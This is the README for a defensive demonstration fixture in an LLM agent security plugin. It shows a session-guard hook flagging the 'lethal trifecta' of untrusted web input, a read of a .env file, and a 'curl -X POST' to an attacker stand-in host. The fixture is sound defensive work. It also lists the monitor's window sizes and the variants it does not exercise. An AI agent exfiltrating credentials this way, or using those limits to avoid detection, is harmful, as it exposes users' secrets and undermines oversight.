Companion to
|
||
|---|---|---|
| .. | ||
| expected-findings.md | ||
| README.md | ||
| run-trifecta.mjs | ||
Lethal Trifecta Walkthrough
WARNING: This is a security demonstration fixture, NOT a real attack. All payloads are synthetic. No external network is contacted, no real file is read, no real command is executed. The script only feeds JSON payloads to one of llm-security's hook scripts.
What this demonstrates
The Rule of Two (Meta, Oct 2025): an agent must never simultaneously hold all three of:
- Untrusted input — content the model didn't author (web pages, MCP output, document uploads, prompt injection surface)
- Sensitive data access — files like
.env,.ssh/,.aws/, credential stores - Exfiltration sink — a path off the box (HTTP POST, scp, paste sites)
Any two are acceptable. All three at once is the lethal trifecta (Simon Willison / Invariant Labs framing) — at that point, prompt injection becomes credential theft.
post-session-guard.mjs (PostToolUse hook on every tool) tracks tool
calls in a 20-call sliding window and emits a SECURITY ADVISORY when all
three classes appear. This walkthrough shows it firing on a 5-step
sequence.
Sequence
| # | Tool | Class | Advisory? |
|---|---|---|---|
| 1 | WebFetch | input_source | no — only one class |
| 2 | Read /path/.env |
data_access (sensitive) | no — only two classes |
| 3 | Bash curl -X POST attacker/... |
exfil_sink | YES — trifecta closes |
| 4 | Bash ls -la |
neutral | no — already warned in window |
| 5 | Bash curl -X POST attacker/... |
exfil_sink | no — suppressed |
The advisory at step 3 lists the evidence and recommends remediations
(disable HTTP exfil, gate sensitive-path reads, narrow tool surface).
Step 4-5 are present to show suppression: post-session-guard writes a
warning marker into the state file so the operator isn't spammed by the
same trifecta repeating within the window.
How to run
cd plugins/llm-security
node examples/lethal-trifecta-walkthrough/run-trifecta.mjs
# Detailed output (full advisory text + stderr)
node examples/lethal-trifecta-walkthrough/run-trifecta.mjs --verbose
Expected: 5 pass, 0 fail and a SECURITY ADVISORY (session-guard)
preview after step 3.
Hooks / scanners involved
hooks/scripts/post-session-guard.mjs— the only hook invoked. Configurable viapolicy.jsontrifecta.mode(block/warn/off; defaultwarn) or env varLLM_SECURITY_TRIFECTA_MODE.
This example uses mode: warn (default). In block mode the third
call's advisory becomes a hard block (exit 2) and the agent action is
denied — see docs/security-hardening-guide.md §3 for when to switch.
OWASP / framework mapping
| Code | Framework | Why |
|---|---|---|
| LLM01 | OWASP LLM Top 10 (2025) | Prompt injection lands via the input_source leg |
| LLM02 | OWASP LLM Top 10 (2025) | Sensitive output disclosure (the .env exfil) |
| ASI01 | OWASP Agentic Top 10 | Excessive Agency — agent holds all three capabilities |
| ASI02 | OWASP Agentic Top 10 | Agent Data Leakage — exfil sink + sensitive read |
State isolation
post-session-guard stores per-session state at
${os.tmpdir()}/llm-security-session-${ppid}.jsonl. Because all five
hook invocations are spawned by the same run-trifecta.mjs process,
they share that script's PID as their parent PID — so the entire
walkthrough lives in a single state file. The script deletes the file
in a finally block before exiting. Your real session state under
/tmp/ is never touched.
Limitations
- The walkthrough demonstrates the primary 20-call sliding-window
trifecta. It does not exercise the 100-call slow-burn variant
(
SLOW_BURN_MIN_SPREAD = 50), the MCP-concentrated variant (all three legs from the same MCP server), behavioral drift via Jensen-Shannon divergence, or volume-threshold advisories. Those have their own unit tests undertests/lib/post-session-guard.*. - This is deterministic detection. It does not exercise the
block-mode exit-2 path — flipLLM_SECURITY_TRIFECTA_MODE=blockand re-run if you want to see the script fail at step 3.
See also
docs/security-hardening-guide.md§3 — Rule of Two and configurationknowledge/owasp-agentic-top10.md— ASI01 / ASI02 backgroundknowledge/deepmind-agent-traps.md— adjacent attack categoriesexamples/prompt-injection-showcase/— the input_source leg in isolationexpected-findings.md(in this folder) — the testable contract